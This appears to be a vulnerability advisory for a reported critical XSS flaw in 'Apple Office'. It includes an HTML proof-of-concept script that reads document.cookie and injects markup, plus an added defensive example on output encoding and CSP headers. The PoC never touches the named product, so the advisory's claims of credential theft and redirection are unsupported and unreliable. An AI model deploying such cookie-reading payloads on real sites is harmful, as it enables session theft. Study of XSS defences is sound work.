Critical Severity
CVE-2024-60566
Published: Jun 28, 2025
This exploit targets an XSS vulnerability in Apple Office.
The vulnerability allows an attacker to:
- Inject malicious scripts into web pages
- Steal user credentials and session tokens
- Redirect users to malicious websites
This vulnerability has been assigned CVE-2024-60566 with a CVSS score of 9.9.
Affected versions: Apple Office versions prior to the latest security update
<!DOCTYPE html>
<html>
<head>
  <title>XSS PoC - Educational Only</title>
</head>
<body>
  <h2>Cross-Site Scripting Proof of Concept</h2>
  <p>This demonstrates a reflected XSS vulnerability.</p>
  <script>
    // XSS Payload - Educational purposes only
    function demonstrateXSS() {
      // Simple alert to show XSS execution
      alert("XSS Vulnerability Confirmed: " + document.domain);
      // Cookie theft demonstration (ethical testing only)
      if (document.cookie) {
        console.log("Cookies available: " + document.cookie);
      }
      // DOM manipulation example
      document.body.style.backgroundColor = "#ff0000";
      document.body.innerHTML += "<h1 style='color:white;'>XSS Executed</h1>";
    }
    // Trigger the demonstration
    demonstrateXSS();
  </script>
</body>
</html>
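
A defensive counterpart to the proof of concept above, added here as an example and not part of the original page or any vendor fix: it shows output encoding for a reflected value plus response headers that blunt the three behaviours the PoC demonstrates (inline script execution, reading document.cookie, DOM injection). The function names, the "Results for" template and the sample values are assumptions constructed for illustration.

```javascript
// Added example: hardening a page that reflects a request parameter.
// All names and sample values below are constructed for illustration.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode a value for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: reflected input concatenated straight into markup.
function renderUnsafe(query) {
  return "<p>Results for: " + query + "</p>";
}

// Hardened pattern: the same template with contextual output encoding.
function renderSafe(query) {
  return "<p>Results for: " + escapeHtml(query) + "</p>";
}

// Response headers that limit the impact if an encoding step is missed.
function securityHeaders(sessionId) {
  return {
    // No inline scripts allowed, so a reflected <script> block will not run.
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    // HttpOnly keeps the session cookie out of document.cookie.
    "Set-Cookie":
      "session=" + encodeURIComponent(sessionId) + "; HttpOnly; Secure; SameSite=Lax; Path=/",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed sample input mirroring the alert call in the PoC above.
const sample = '<script>alert("XSS Vulnerability Confirmed: " + document.domain)</script>';
console.log(renderUnsafe(sample)); // markup still contains a live <script> element
console.log(renderSafe(sample));   // same input rendered as inert text
console.log(securityHeaders("constructed-session-id"));
```
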